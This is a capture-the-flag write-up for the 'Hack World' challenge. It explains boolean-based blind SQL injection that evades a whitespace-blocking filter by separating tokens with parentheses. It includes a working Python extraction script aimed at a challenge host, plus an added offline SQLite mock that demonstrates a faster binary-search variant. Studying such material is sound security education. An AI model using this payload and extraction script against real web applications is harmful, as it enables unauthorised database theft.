CTF-WriteUp

[华北赛区]Hack World

The page takes an id parameter and has only two possible responses, one for id=1 and one for id=2, which strongly suggests boolean-based blind SQL injection.
Fuzzing showed that the WAF filters spaces (BUUCTF containers usually cannot withstand fuzzing, so keep it light). Parentheses can be used in place of the spaces, since MySQL does not need whitespace between a keyword and a parenthesised expression.
Here the commonly used payload was used directly: if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2). If the first character of the flag is 'f' the expression evaluates to 1 and the id=1 page comes back, otherwise the id=2 page does; repeating this per position and per candidate byte recovers the whole flag.
exp
import requests

# Body returned for id=1; when the injected condition is false the id=2 page is returned instead
string = "Hello, glzjin wants a girlfriend."
url = "http://c51bbb75-0b7f-4f51-8343-a1e164f75d10.node3.buuoj.cn/index.php"
flag = ""
for i in range(1, 50):            # MySQL substr() positions are 1-based
    found = False
    for j in range(32, 127):      # printable ASCII only
        # No spaces anywhere in the payload: parentheses separate every token
        payload = "if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)" % (i, j)
        response = requests.post(url, data={'id': payload})
        if response.text.find(string) != -1:
            flag += chr(j)
            # Print after every character so a network failure mid-run loses nothing
            print(flag)
            found = True
            break
    if not found:                 # substr() past the end returns '', so the flag is complete
        break
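The following is an added example, not code from the original write-up, that makes the whole technique reproducible offline: it models the challenge backend in SQLite (a whitespace-blocking WAF in front of an unparameterised query, plus the table and column both named flag as in the write-up) and runs the blind extraction against it. The flag value, the id=2 response text, the WAF and no-result messages, and the assumption that the WAF only blocks whitespace are all made up here. It also goes beyond the write-up's linear scan of 0..126 by binary-searching the byte value, which needs 7 requests per character instead of up to 127. SQLite has no if() or ascii(), so equivalents are registered so the write-up's exact payload runs unchanged.

```python
import re
import sqlite3

# Constructed stand-in for the challenge backend; the flag is made up.
FAKE_FLAG = "flag{parens_beat_the_space_filter}"
TRUE_PAGE = "Hello, glzjin wants a girlfriend."   # body for id=1, taken from the write-up
FALSE_PAGE = "Do you want to be my girlfriend?"   # assumed body for id=2
BLOCKED_PAGE = "SQL Injection Checked."           # assumed WAF response
EMPTY_PAGE = "Error Occured When Fetch Result."   # assumed body when no row matches


class MockHackWorld:
    """Minimal model of index.php: a WAF that rejects any whitespace, then a
    query that concatenates the id parameter straight into SQL.  The if() and
    ascii() functions are registered so the MySQL payload works in SQLite."""

    def __init__(self, flag=FAKE_FLAG):
        self.requests = 0                 # counts calls to get(), to compare strategies
        self.conn = sqlite3.connect(":memory:")
        self.conn.create_function("if", 3, lambda cond, a, b: a if cond else b)
        self.conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
        self.conn.execute("CREATE TABLE messages (id INTEGER, content TEXT)")
        self.conn.executemany("INSERT INTO messages VALUES (?, ?)",
                              [(1, TRUE_PAGE), (2, FALSE_PAGE)])
        self.conn.execute("CREATE TABLE flag (flag TEXT)")
        self.conn.execute("INSERT INTO flag VALUES (?)", (flag,))

    def get(self, user_id):
        """One request: returns the page body for the given id parameter."""
        self.requests += 1
        if re.search(r"\s", user_id):     # the filter the write-up found by fuzzing
            return BLOCKED_PAGE
        try:
            row = self.conn.execute(
                "SELECT content FROM messages WHERE id=" + user_id).fetchone()
        except sqlite3.Error:
            return EMPTY_PAGE
        return row[0] if row else EMPTY_PAGE


def char_oracle(site, pos, threshold):
    """True iff the byte at 1-based position pos of the flag is >= threshold.
    The condition contains no whitespace: parentheses separate every token."""
    cond = "ascii(substr((select(flag)from(flag)),%d,1))>=%d" % (pos, threshold)
    return site.get("if(%s,1,2)" % cond) == TRUE_PAGE


def extract_flag(site, max_len=64):
    """Boolean-blind extraction, one byte at a time, binary-searching the
    ASCII value in 0..127 (exactly 7 requests per byte)."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if char_oracle(site, pos, mid):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:                       # substr() past the end returns '' -> ascii 0
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    site = MockHackWorld()
    print("with spaces :", site.get("if(1=1, 1, 2)"))          # blocked by the WAF
    print("write-up PoC:", site.get(
        "if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)"))
    site = MockHackWorld()
    print("extracted   :", extract_flag(site), "in", site.requests, "requests")
```

The linear scan in the exploit above would need up to 95 requests per character for the printable range; the binary search needs 7 regardless, which matters on a rate-limited or flaky container. The two oracle queries differ only in the comparison operator, so the same parenthesis-only payload shape carries over to the real target.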